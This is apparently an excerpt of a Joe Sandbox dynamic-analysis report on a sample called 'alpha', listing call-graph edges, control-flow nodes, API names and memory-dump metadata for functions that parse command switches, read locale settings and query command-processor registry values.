7ff744f2c775 19691->19692 19696 7ff744f2c7ab 19691->19696 19693 7ff744f0cd90 166 API calls 19692->19693 19695 7ff744f2c781 19693->19695 19694 7ff744f2c8d4 19694->19537 19695->19694 19697 7ff744f0b0d8 194 API calls 19695->19697 19696->19694 19696->19695 19698 7ff744f0b6b0 170 API calls 19696->19698 19699 7ff744f0b038 _dup2 19696->19699 19700 7ff744f0d208 _close 19696->19700 19697->19694 19698->19696 19699->19696 19700->19696 19709 7ff744f2d419 19702->19709 19703 7ff744f2d555 19727 7ff744f2d31c 19703->19727 19704 7ff744f2d592 19705 7ff744f13448 166 API calls 19704->19705 19708 7ff744f2d5a5 19705->19708 19706 7ff744f2d5c4 19710 7ff744f13448 166 API calls 19706->19710 19711 7ff744f2d5ba 19708->19711 19716 7ff744f13448 166 API calls 19708->19716 19709->19703 19709->19704 19709->19706 19712 7ff744f2d541 19709->19712 19713 7ff744f13448 166 API calls 19709->19713 19715 7ff744f1cadf 19709->19715 19719 7ff744f2d3fc 166 API calls 19709->19719 19710->19715 19720 7ff744f2d36c 19711->19720 19712->19704 19712->19706 19714 7ff744f2d546 19712->19714 19718 7ff744f2d589 19712->19718 19713->19709 19714->19703 19714->19706 19716->19711 19718->19703 19718->19704 19719->19709 19721 7ff744f2d3d8 19720->19721 19722 7ff744f2d381 19720->19722 19723 7ff744f134a0 166 API calls 19722->19723 19725 7ff744f2d390 19723->19725 19724 7ff744f13448 166 API calls 19724->19725 19725->19721 19725->19724 19726 7ff744f134a0 166 API calls 19725->19726 19726->19725 19728 7ff744f13448 166 API calls 19727->19728 19729 7ff744f2d33b 19728->19729 19730 7ff744f2d36c 166 API calls 19729->19730 19731 7ff744f2d343 19730->19731 19732 7ff744f2d3fc 166 API calls 19731->19732 19739 7ff744f2d34e 19732->19739 19733 7ff744f2d555 19737 7ff744f2d31c 166 API calls 19733->19737 19734 7ff744f2d592 19735 7ff744f13448 166 API calls 19734->19735 19738 7ff744f2d5a5 19735->19738 19736 7ff744f2d5c4 19741 7ff744f13448 166 API calls 19736->19741 19745 7ff744f2d5c2 19737->19745 19742 7ff744f2d5ba 19738->19742 19746 7ff744f13448 166 API calls 19738->19746 19739->19733 19739->19734 19739->19736 19740 7ff744f2d541 19739->19740 19743 7ff744f13448 166 API calls 19739->19743 19739->19745 19749 7ff744f2d3fc 166 API calls 19739->19749 19740->19734 19740->19736 19744 7ff744f2d546 19740->19744 19748 7ff744f2d589 19740->19748 19741->19745 19747 7ff744f2d36c 166 API calls 19742->19747 19743->19739 19744->19733 19744->19736 19745->19715 19746->19742 19747->19745 19748->19733 19748->19734 19749->19739 19751 7ff744f0745f 19750->19751 19752 7ff744f07468 19750->19752 19751->19752 19753 7ff744f248c8 _wcsicmp 19751->19753 19754 7ff744f07497 _wcsicmp 19751->19754 19752->19625 19752->19630 19757 7ff744f248ed CreateFileW 19753->19757 19755 7ff744f11ea0 8 API calls 19754->19755 19756 7ff744f074bd 19755->19756 19756->19757 19758 7ff744f074c9 CreateFileW 19756->19758 19757->19758 19759 7ff744f24929 19757->19759 19760 7ff744f07501 _open_osfhandle 19758->19760 19761 7ff744f24943 GetLastError 19758->19761 19759->19760 19760->19752 19762 7ff744f07520 CloseHandle 19760->19762 19761->19752 19762->19752 19764->19633 19768 7ff744f2773c 19765->19768 19766 7ff744f2777d 19766->19684 19767 7ff744f13448 166 API calls 19767->19768 19768->19766 19768->19767 19770 7ff744f2778c 166 API calls 19769->19770 19772 7ff744f276fb 19770->19772 19771 7ff744f2771c 19771->19684 19772->19771 19773 7ff744f13448 166 API calls 19772->19773 19774 7ff744f27711 19773->19774 19775 7ff744f2778c 166 API calls 19774->19775 19775->19771 19777 7ff744f072de 19776->19777 19778 7ff744f24621 19776->19778 19780 7ff744f072eb 19777->19780 19784 7ff744f24467 19777->19784 19785 7ff744f24530 19777->19785 19779 7ff744f247e0 19778->19779 19781 7ff744f2447b longjmp 19778->19781 19786 7ff744f24639 19778->19786 19805 7ff744f2475e 19778->19805 19782 7ff744f07348 168 API calls 19779->19782 19837 7ff744f07348 19780->19837 19787 7ff744f24492 19781->19787 19836 7ff744f24524 19782->19836 19784->19780 19784->19787 19796 7ff744f24475 19784->19796 19792 7ff744f07348 168 API calls 19785->19792 19789 7ff744f2463e 19786->19789 19790 7ff744f24695 19786->19790 19791 7ff744f07348 168 API calls 19787->19791 19789->19781 19803 7ff744f24654 19789->19803 19795 7ff744f073d4 168 API calls 19790->19795 19810 7ff744f244a8 19791->19810 19798 7ff744f24549 19792->19798 19793 7ff744f07315 19852 7ff744f073d4 19793->19852 19802 7ff744f2469a 19795->19802 19796->19781 19796->19790 19797 7ff744f07348 168 API calls 19797->19779 19804 7ff744f245b2 19798->19804 19822 7ff744f07348 168 API calls 19798->19822 19826 7ff744f2455e 19798->19826 19799 7ff744f072b0 168 API calls 19806 7ff744f2480e 19799->19806 19800 7ff744f07348 168 API calls 19800->19793 19801 7ff744f07323 19801->19252 19818 7ff744f246e1 19802->19818 19827 7ff744f246c7 19802->19827 19828 7ff744f246ea 19802->19828 19811 7ff744f07348 168 API calls 19803->19811 19807 7ff744f07348 168 API calls 19804->19807 19805->19797 19806->19252 19809 7ff744f245c7 19807->19809 19808 7ff744f072b0 168 API calls 19816 7ff744f24738 19808->19816 19813 7ff744f07348 168 API calls 19809->19813 19814 7ff744f07348 168 API calls 19810->19814 19821 7ff744f244e2 19810->19821 19811->19801 19812 7ff744f07348 168 API calls 19812->19804 19820 7ff744f245db 19813->19820 19814->19821 19815 7ff744f072b0 168 API calls 19817 7ff744f244f1 19815->19817 19819 7ff744f07348 168 API calls 19816->19819 19824 7ff744f072b0 168 API calls 19817->19824 19818->19808 19819->19836 19823 7ff744f07348 168 API calls 19820->19823 19821->19815 19822->19826 19829 7ff744f245ec 19823->19829 19825 7ff744f24503 19824->19825 19825->19801 19833 7ff744f07348 168 API calls 19825->19833 19826->19804 19826->19812 19827->19818 19834 7ff744f07348 168 API calls 19827->19834 19830 7ff744f07348 168 API calls 19828->19830 19831 7ff744f07348 168 API calls 19829->19831 19830->19818 19832 7ff744f24600 19831->19832 19835 7ff744f07348 168 API calls 19832->19835 19833->19836 19834->19818 19835->19836 19836->19799 19836->19801 19843 7ff744f0735d 19837->19843 19838 7ff744f03278 166 API calls 19839 7ff744f24820 longjmp 19838->19839 19840 7ff744f24838 19839->19840 19841 7ff744f03278 166 API calls 19840->19841 19842 7ff744f24844 longjmp 19841->19842 19844 7ff744f2485a 19842->19844 19843->19838 19843->19840 19843->19843 19851 7ff744f073ab 19843->19851 19845 7ff744f07348 166 API calls 19844->19845 19846 7ff744f2487b 19845->19846 19847 7ff744f07348 166 API calls 19846->19847 19848 7ff744f248ad 19847->19848 19849 7ff744f07348 166 API calls 19848->19849 19850 7ff744f072ff 19849->19850 19850->19793 19850->19800 19853 7ff744f2485a 19852->19853 19854 7ff744f07401 19852->19854 19855 7ff744f07348 168 API calls 19853->19855 19854->19801 19856 7ff744f2487b 19855->19856 19857 7ff744f07348 168 API calls 19856->19857 19858 7ff744f248ad 19857->19858 19859 7ff744f07348 168 API calls 19858->19859 19860 7ff744f248be 19859->19860 19860->19801 16712 7ff744f18d80 16713 7ff744f18da4 16712->16713 16714 7ff744f18db6 16713->16714 16715 7ff744f18dbf Sleep 16713->16715 16716 7ff744f18ddb _amsg_exit 16714->16716 16719 7ff744f18de7 16714->16719 16715->16713 16716->16719 16717 7ff744f18e73 _IsNonwritableInCurrentImage 16726 7ff744f137d8 GetCurrentThreadId OpenThread 16717->16726 16718 7ff744f18e56 _initterm 16718->16717 16719->16717 16719->16718 16724 7ff744f18e3c 16719->16724 16759 7ff744f104f4 16726->16759 16728 7ff744f13839 HeapSetInformation RegOpenKeyExW 16729 7ff744f1e9f8 RegQueryValueExW RegCloseKey 16728->16729 16730 7ff744f1388d 16728->16730 16732 7ff744f1ea41 GetThreadLocale 16729->16732 16731 7ff744f15920 VirtualQuery VirtualQuery 16730->16731 16733 7ff744f138ab GetConsoleOutputCP GetCPInfo 16731->16733 16750 7ff744f13919 16732->16750 16733->16732 16734 7ff744f138f1 memset 16733->16734 16734->16750 16735 7ff744f14d5c 391 API calls 16735->16750 16736 7ff744f1eb27 _setjmp 16736->16750 16737 7ff744f13948 _setjmp 16737->16750 16738 7ff744f03240 166 API calls 16738->16750 16739 7ff744f28530 370 API calls 16739->16750 16740 7ff744f101b8 6 API calls 16740->16750 16741 7ff744f14c1c 166 API calls 16741->16750 16742 7ff744f1eb71 _setmode 16742->16750 16743 7ff744f0df60 481 API calls 16743->16750 16744 7ff744f186f0 182 API calls 16744->16750 16745 7ff744f10580 12 API calls 16746 7ff744f1398b GetConsoleOutputCP GetCPInfo 16745->16746 16748 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16746->16748 16747 7ff744f158e4 EnterCriticalSection LeaveCriticalSection 16747->16750 16748->16750 16749 7ff744f0be00 659 API calls 16749->16750 16750->16729 16750->16735 16750->16736 16750->16737 16750->16738 16750->16739 16750->16740 16750->16741 16750->16742 16750->16743 16750->16744 16750->16745 16750->16747 16750->16749 16751 7ff744f158e4 EnterCriticalSection LeaveCriticalSection 16750->16751 16752 7ff744f1ebbe GetConsoleOutputCP GetCPInfo 16751->16752 16753 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16752->16753 16754 7ff744f1ebe6 16753->16754 16755 7ff744f0be00 659 API calls 16754->16755 16756 7ff744f10580 12 API calls 16754->16756 16755->16754 16757 7ff744f1ebfc GetConsoleOutputCP GetCPInfo 16756->16757 16758 7ff744f104f4 GetModuleHandleW GetProcAddress SetThreadLocale 16757->16758 16758->16750 16760 7ff744f10504 16759->16760 16761 7ff744f1051e GetModuleHandleW 16760->16761 16762 7ff744f1054d GetProcAddress 16760->16762 16763 7ff744f1056c SetThreadLocale 16760->16763 16761->16760 16762->16760

                              Executed Functions

                              Function 00007FF744F0AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ff744f0aa54-7ff744f0aa98 call 7ff744f0cd90 3 7ff744f1bf5a-7ff744f1bf70 call 7ff744f14c1c call 7ff744f0ff70 0->3 4 7ff744f0aa9e 0->4 5 7ff744f0aaa5-7ff744f0aaa8 4->5 7 7ff744f0acde-7ff744f0ad00 5->7 8 7ff744f0aaae-7ff744f0aac8 wcschr 5->8 13 7ff744f0ad06 7->13 8->7 10 7ff744f0aace-7ff744f0aae9 towlower 8->10 10->7 12 7ff744f0aaef-7ff744f0aaf3 10->12 15 7ff744f1beb7-7ff744f1bec4 call 7ff744f2eaf0 12->15 16 7ff744f0aaf9-7ff744f0aafd 12->16 17 7ff744f0ad0d-7ff744f0ad1f 13->17 27 7ff744f1bf43-7ff744f1bf59 call 7ff744f14c1c 15->27 28 7ff744f1bec6-7ff744f1bed8 call 7ff744f03240 15->28 19 7ff744f1bbcf 16->19 20 7ff744f0ab03-7ff744f0ab07 16->20 21 7ff744f0ad22-7ff744f0ad2a call 7ff744f113e0 17->21 29 7ff744f1bbde 19->29 23 7ff744f0ab09-7ff744f0ab0d 20->23 24 7ff744f0ab7d-7ff744f0ab81 20->24 21->5 31 7ff744f1be63 23->31 32 7ff744f0ab13-7ff744f0ab17 23->32 30 7ff744f0ab87-7ff744f0ab95 24->30 24->31 27->3 28->27 45 7ff744f1beda-7ff744f1bee9 call 7ff744f03240 28->45 40 7ff744f1bbea-7ff744f1bbec 29->40 36 7ff744f0ab98-7ff744f0aba0 30->36 43 7ff744f1be72-7ff744f1be88 call 7ff744f03278 call 7ff744f14c1c 31->43 32->24 37 7ff744f0ab19-7ff744f0ab1d 32->37 36->36 41 7ff744f0aba2-7ff744f0abb3 call 7ff744f0cd90 36->41 37->29 42 7ff744f0ab23-7ff744f0ab27 37->42 50 7ff744f1bbf8-7ff744f1bc01 40->50 41->3 56 7ff744f0abb9-7ff744f0abde call 7ff744f113e0 call 7ff744f133a8 41->56 42->40 47 7ff744f0ab2d-7ff744f0ab31 42->47 65 7ff744f1be89-7ff744f1be8c 43->65 60 7ff744f1beeb-7ff744f1bef1 45->60 61 7ff744f1bef3-7ff744f1bef9 45->61 47->13 52 7ff744f0ab37-7ff744f0ab3b 47->52 50->17 52->50 53 7ff744f0ab41-7ff744f0ab45 52->53 57 7ff744f0ab4b-7ff744f0ab4f 53->57 58 7ff744f1bc06-7ff744f1bc2a call 7ff744f113e0 53->58 89 7ff744f0abe4-7ff744f0abe7 56->89 90 7ff744f0ac75 56->90 63 7ff744f0ad2f-7ff744f0ad33 57->63 64 7ff744f0ab55-7ff744f0ab78 call 7ff744f113e0 57->64 82 7ff744f1bc5a-7ff744f1bc61 58->82 83 7ff744f1bc2c-7ff744f1bc4c _wcsnicmp 58->83 60->27 60->61 61->27 66 7ff744f1befb-7ff744f1bf0d call 7ff744f03240 61->66 74 7ff744f0ad39-7ff744f0ad3d 63->74 75 7ff744f1bc66-7ff744f1bc8a call 7ff744f113e0 63->75 64->5 70 7ff744f0acbe 65->70 71 7ff744f1be92-7ff744f1beaa call 7ff744f03278 call 7ff744f14c1c 65->71 66->27 96 7ff744f1bf0f-7ff744f1bf21 call 7ff744f03240 66->96 79 7ff744f0acc0-7ff744f0acc7 70->79 124 7ff744f1beab-7ff744f1beb6 call 7ff744f14c1c 71->124 84 7ff744f1bcde-7ff744f1bd02 call 7ff744f113e0 74->84 85 7ff744f0ad43-7ff744f0ad49 74->85 103 7ff744f1bc8c-7ff744f1bcaa _wcsnicmp 75->103 104 7ff744f1bcc4-7ff744f1bcdc 75->104 79->79 93 7ff744f0acc9-7ff744f0acda 79->93 91 7ff744f1bd31-7ff744f1bd4f _wcsnicmp 82->91 83->82 97 7ff744f1bc4e-7ff744f1bc55 83->97 119 7ff744f1bd2a 84->119 120 7ff744f1bd04-7ff744f1bd24 _wcsnicmp 84->120 87 7ff744f1bd5e-7ff744f1bd65 85->87 88 7ff744f0ad4f-7ff744f0ad68 85->88 87->88 98 7ff744f1bd6b-7ff744f1bd73 87->98 100 7ff744f0ad6a 88->100 101 7ff744f0ad6d-7ff744f0ad70 88->101 89->70 102 7ff744f0abed-7ff744f0ac0b call 7ff744f0cd90 * 2 89->102 107 7ff744f0ac77-7ff744f0ac7f 90->107 109 7ff744f1bbc2-7ff744f1bbca 91->109 110 7ff744f1bd55 91->110 93->7 96->27 127 7ff744f1bf23-7ff744f1bf35 call 7ff744f03240 96->127 99 7ff744f1bbb3-7ff744f1bbb7 97->99 111 7ff744f1be4a-7ff744f1be5e 98->111 112 7ff744f1bd79-7ff744f1bd8b iswxdigit 98->112 113 7ff744f1bbba-7ff744f1bbbd call 7ff744f113e0 99->113 100->101 101->21 102->124 140 7ff744f0ac11-7ff744f0ac14 102->140 103->104 117 7ff744f1bcac-7ff744f1bcbf 103->117 104->91 107->70 115 7ff744f0ac81-7ff744f0ac85 107->115 109->5 110->87 111->113 112->111 121 7ff744f1bd91-7ff744f1bda3 iswxdigit 112->121 113->109 126 7ff744f0ac88-7ff744f0ac8f 115->126 117->99 119->91 120->119 125 7ff744f1bbac 120->125 121->111 128 7ff744f1bda9-7ff744f1bdbb iswxdigit 121->128 124->15 125->99 126->126 130 7ff744f0ac91-7ff744f0ac94 126->130 127->27 142 7ff744f1bf37-7ff744f1bf3e call 7ff744f03240 127->142 128->111 135 7ff744f1bdc1-7ff744f1bdd7 iswdigit 128->135 130->70 133 7ff744f0ac96-7ff744f0acaa wcsrchr 130->133 133->70 141 7ff744f0acac-7ff744f0acb9 call 7ff744f11300 133->141 138 7ff744f1bdd9-7ff744f1bddd 135->138 139 7ff744f1bddf-7ff744f1bdeb towlower 135->139 145 7ff744f1bdee-7ff744f1be0f iswdigit 138->145 139->145 140->124 146 7ff744f0ac1a-7ff744f0ac33 memset 140->146 141->70 142->27 147 7ff744f1be17-7ff744f1be23 towlower 145->147 148 7ff744f1be11-7ff744f1be15 145->148 146->90 149 7ff744f0ac35-7ff744f0ac4b wcschr 146->149 150 7ff744f1be26-7ff744f1be45 call 7ff744f113e0 147->150 148->150 149->90 151 7ff744f0ac4d-7ff744f0ac54 149->151 150->111 152 7ff744f0ac5a-7ff744f0ac6f wcschr 151->152 153 7ff744f0ad72-7ff744f0ad91 wcschr 151->153 152->90 152->153 155 7ff744f0ad97-7ff744f0adac wcschr 153->155 156 7ff744f0af03-7ff744f0af07 153->156 155->156 157 7ff744f0adb2-7ff744f0adc7 wcschr 155->157 156->90 157->156 158 7ff744f0adcd-7ff744f0ade2 wcschr 157->158 158->156 159 7ff744f0ade8-7ff744f0adfd wcschr 158->159 159->156 160 7ff744f0ae03-7ff744f0ae18 wcschr 159->160 160->156 161 7ff744f0ae1e-7ff744f0ae21 160->161 162 7ff744f0ae24-7ff744f0ae27 161->162 162->156 163 7ff744f0ae2d-7ff744f0ae40 iswspace 162->163 164 7ff744f0ae4b-7ff744f0ae5e 163->164 165 7ff744f0ae42-7ff744f0ae49 163->165 166 7ff744f0ae66-7ff744f0ae6d 164->166 165->162 166->166 167 7ff744f0ae6f-7ff744f0ae77 166->167 167->43 168 7ff744f0ae7d-7ff744f0ae97 call 7ff744f113e0 167->168 171 7ff744f0ae9a-7ff744f0aea4 168->171 172 7ff744f0aebc-7ff744f0aef8 call 7ff744f10a6c call 7ff744f0ff70 * 2 171->172 173 7ff744f0aea6-7ff744f0aead 171->173 172->107 181 7ff744f0aefe 172->181 173->172 174 7ff744f0aeaf-7ff744f0aeba 173->174 174->171 174->172 181->65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                              • String ID: :$:$:$:ON$OFF
                              • API String ID: 972821348-467788257
                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction ID: e10ee5a522bbb755d48d25c807a506317924d67c08fac7982468edd730a12ed6
                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction Fuzzy Hash: 8B227121E0D642C6EB64BF239598279E6A1EF95B81FCD8135CD0E477DDDE3CA840A360
                              Function 00007FF744F151EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 182 7ff744f151ec-7ff744f15248 call 7ff744f15508 GetLocaleInfoW 185 7ff744f1524e-7ff744f15272 GetLocaleInfoW 182->185 186 7ff744f1ef32-7ff744f1ef3c 182->186 188 7ff744f15274-7ff744f1527a 185->188 189 7ff744f15295-7ff744f152b9 GetLocaleInfoW 185->189 187 7ff744f1ef3f-7ff744f1ef49 186->187 190 7ff744f1ef4b-7ff744f1ef52 187->190 191 7ff744f1ef61-7ff744f1ef6c 187->191 192 7ff744f154f7-7ff744f154f9 188->192 193 7ff744f15280-7ff744f15286 188->193 194 7ff744f152bb-7ff744f152c3 189->194 195 7ff744f152de-7ff744f15305 GetLocaleInfoW 189->195 190->191 196 7ff744f1ef54-7ff744f1ef5f 190->196 199 7ff744f1ef75-7ff744f1ef78 191->199 192->186 193->192 197 7ff744f1528c-7ff744f1528f 193->197 198 7ff744f152c9-7ff744f152d7 194->198 194->199 200 7ff744f15307-7ff744f1531b 195->200 201 7ff744f15321-7ff744f15343 GetLocaleInfoW 195->201 196->187 196->191 197->189 198->195 204 7ff744f1ef7a-7ff744f1ef7d 199->204 205 7ff744f1ef99-7ff744f1efa3 199->205 200->201 202 7ff744f15349-7ff744f1536e GetLocaleInfoW 201->202 203 7ff744f1efaf-7ff744f1efb9 201->203 206 7ff744f1eff2-7ff744f1effc 202->206 207 7ff744f15374-7ff744f15396 GetLocaleInfoW 202->207 209 7ff744f1efbc-7ff744f1efc6 203->209 204->195 208 7ff744f1ef83-7ff744f1ef8d 204->208 205->203 210 7ff744f1efff-7ff744f1f009 206->210 211 7ff744f1539c-7ff744f153be GetLocaleInfoW 207->211 212 7ff744f1f035-7ff744f1f03f 207->212 208->205 213 7ff744f1efc8-7ff744f1efcf 209->213 214 7ff744f1efde-7ff744f1efe9 209->214 215 7ff744f1f00b-7ff744f1f012 210->215 216 7ff744f1f021-7ff744f1f02c 210->216 217 7ff744f1f078-7ff744f1f082 211->217 218 7ff744f153c4-7ff744f153e6 GetLocaleInfoW 211->218 219 7ff744f1f042-7ff744f1f04c 212->219 213->214 220 7ff744f1efd1-7ff744f1efdc 213->220 214->206 215->216 221 7ff744f1f014-7ff744f1f01f 215->221 216->212 226 7ff744f1f085-7ff744f1f08f 217->226 222 7ff744f1f0bb-7ff744f1f0c5 218->222 223 7ff744f153ec-7ff744f1540e GetLocaleInfoW 218->223 224 7ff744f1f04e-7ff744f1f055 219->224 225 7ff744f1f064-7ff744f1f06f 219->225 220->209 220->214 221->210 221->216 227 7ff744f1f0c8-7ff744f1f0d2 222->227 228 7ff744f1f0fe-7ff744f1f108 223->228 229 7ff744f15414-7ff744f15436 GetLocaleInfoW 223->229 224->225 230 7ff744f1f057-7ff744f1f062 224->230 225->217 231 7ff744f1f0a7-7ff744f1f0b2 226->231 232 7ff744f1f091-7ff744f1f098 226->232 234 7ff744f1f0ea-7ff744f1f0f5 227->234 235 7ff744f1f0d4-7ff744f1f0db 227->235 238 7ff744f1f10b-7ff744f1f115 228->238 236 7ff744f1543c-7ff744f1545e GetLocaleInfoW 229->236 237 7ff744f1f141-7ff744f1f14b 229->237 230->219 230->225 231->222 232->231 233 7ff744f1f09a-7ff744f1f0a5 232->233 233->226 233->231 234->228 235->234 240 7ff744f1f0dd-7ff744f1f0e8 235->240 241 7ff744f1f184-7ff744f1f18b 236->241 242 7ff744f15464-7ff744f15486 GetLocaleInfoW 236->242 239 7ff744f1f14e-7ff744f1f158 237->239 243 7ff744f1f117-7ff744f1f11e 238->243 244 7ff744f1f12d-7ff744f1f138 238->244 245 7ff744f1f15a-7ff744f1f161 239->245 246 7ff744f1f170-7ff744f1f17b 239->246 240->227 240->234 247 7ff744f1f18e-7ff744f1f198 241->247 248 7ff744f1548c-7ff744f154ae GetLocaleInfoW 242->248 249 7ff744f1f1c4-7ff744f1f1ce 242->249 243->244 250 7ff744f1f120-7ff744f1f12b 243->250 244->237 245->246 251 7ff744f1f163-7ff744f1f16e 245->251 246->241 252 7ff744f1f19a-7ff744f1f1a1 247->252 253 7ff744f1f1b0-7ff744f1f1bb 247->253 254 7ff744f1f207-7ff744f1f20e 248->254 255 7ff744f154b4-7ff744f154f5 setlocale call 7ff744f18f80 248->255 256 7ff744f1f1d1-7ff744f1f1db 249->256 250->238 250->244 251->239 251->246 252->253 258 7ff744f1f1a3-7ff744f1f1ae 252->258 253->249 257 7ff744f1f211-7ff744f1f21b 254->257 260 7ff744f1f1dd-7ff744f1f1e4 256->260 261 7ff744f1f1f3-7ff744f1f1fe 256->261 262 7ff744f1f21d-7ff744f1f224 257->262 263 7ff744f1f233-7ff744f1f23e 257->263 258->247 258->253 260->261 265 7ff744f1f1e6-7ff744f1f1f1 260->265 261->254 262->263 266 7ff744f1f226-7ff744f1f231 262->266 265->256 265->261 266->257 266->263
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InfoLocale$DefaultUsersetlocale
                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                              • API String ID: 1351325837-2236139042
                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction ID: 20321692938c3197c9f5e0751d63a9c4573fe587406562e17cfcfc786ca07f12
                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction Fuzzy Hash: AAF11765B0C642C6EB21BF12E9902B9A6B5BF44B80FD85135CE1D576D8EF3CE905E320
                              Function 00007FF744F15554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 267 7ff744f15554-7ff744f155b9 call 7ff744f1a640 270 7ff744f155bc-7ff744f155e8 RegOpenKeyExW 267->270 271 7ff744f15887-7ff744f1588e 270->271 272 7ff744f155ee-7ff744f15631 RegQueryValueExW 270->272 271->270 273 7ff744f15894-7ff744f158db time srand call 7ff744f18f80 271->273 274 7ff744f1f248-7ff744f1f24d 272->274 275 7ff744f15637-7ff744f15675 RegQueryValueExW 272->275 277 7ff744f1f260-7ff744f1f265 274->277 278 7ff744f1f24f-7ff744f1f25b 274->278 279 7ff744f15677-7ff744f1567c 275->279 280 7ff744f1568e-7ff744f156cc RegQueryValueExW 275->280 277->275 284 7ff744f1f26b-7ff744f1f286 _wtol 277->284 278->275 285 7ff744f1f28b-7ff744f1f290 279->285 286 7ff744f15682-7ff744f15687 279->286 281 7ff744f156d2-7ff744f15710 RegQueryValueExW 280->281 282 7ff744f1f2b6-7ff744f1f2bb 280->282 287 7ff744f15729-7ff744f15767 RegQueryValueExW 281->287 288 7ff744f15712-7ff744f15717 281->288 290 7ff744f1f2ce-7ff744f1f2d3 282->290 291 7ff744f1f2bd-7ff744f1f2c9 282->291 284->275 285->280 289 7ff744f1f296-7ff744f1f2b1 _wtol 285->289 286->280 294 7ff744f15769-7ff744f1576e 287->294 295 7ff744f1579f-7ff744f157dd RegQueryValueExW 287->295 292 7ff744f1f2f9-7ff744f1f2fe 288->292 293 7ff744f1571d-7ff744f15722 288->293 289->280 290->281 296 7ff744f1f2d9-7ff744f1f2f4 _wtol 290->296 291->281 292->287 301 7ff744f1f304-7ff744f1f31a wcstol 292->301 293->287 297 7ff744f1f320-7ff744f1f325 294->297 298 7ff744f15774-7ff744f1578f 294->298 299 7ff744f1f3a9 295->299 300 7ff744f157e3-7ff744f157e8 295->300 296->281 302 7ff744f1f327-7ff744f1f33f wcstol 297->302 303 7ff744f1f34b 297->303 304 7ff744f1f357-7ff744f1f35e 298->304 305 7ff744f15795-7ff744f15799 298->305 308 7ff744f1f3b5-7ff744f1f3b8 299->308 306 7ff744f157ee-7ff744f15809 300->306 307 7ff744f1f363-7ff744f1f368 300->307 301->297 302->303 303->304 304->295 305->295 305->304 311 7ff744f1f39a-7ff744f1f39d 306->311 312 7ff744f1580f-7ff744f15813 306->312 309 7ff744f1f36a-7ff744f1f382 wcstol 307->309 310 7ff744f1f38e 307->310 313 7ff744f1582c 308->313 314 7ff744f1f3be-7ff744f1f3c5 308->314 309->310 310->311 311->299 312->311 315 7ff744f15819-7ff744f15823 312->315 316 7ff744f15832-7ff744f15870 RegQueryValueExW 313->316 318 7ff744f1f3ca-7ff744f1f3d1 313->318 314->316 315->308 317 7ff744f15829 315->317 319 7ff744f1f3dd-7ff744f1f3e2 316->319 320 7ff744f15876-7ff744f15882 RegCloseKey 316->320 317->313 318->319 321 7ff744f1f3e4-7ff744f1f412 ExpandEnvironmentStringsW 319->321 322 7ff744f1f433-7ff744f1f439 319->322 320->271 323 7ff744f1f428 321->323 324 7ff744f1f414-7ff744f1f426 call 7ff744f113e0 321->324 322->320 325 7ff744f1f43f-7ff744f1f44c call 7ff744f0b900 322->325 327 7ff744f1f42e 323->327 324->327 325->320 327->322
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
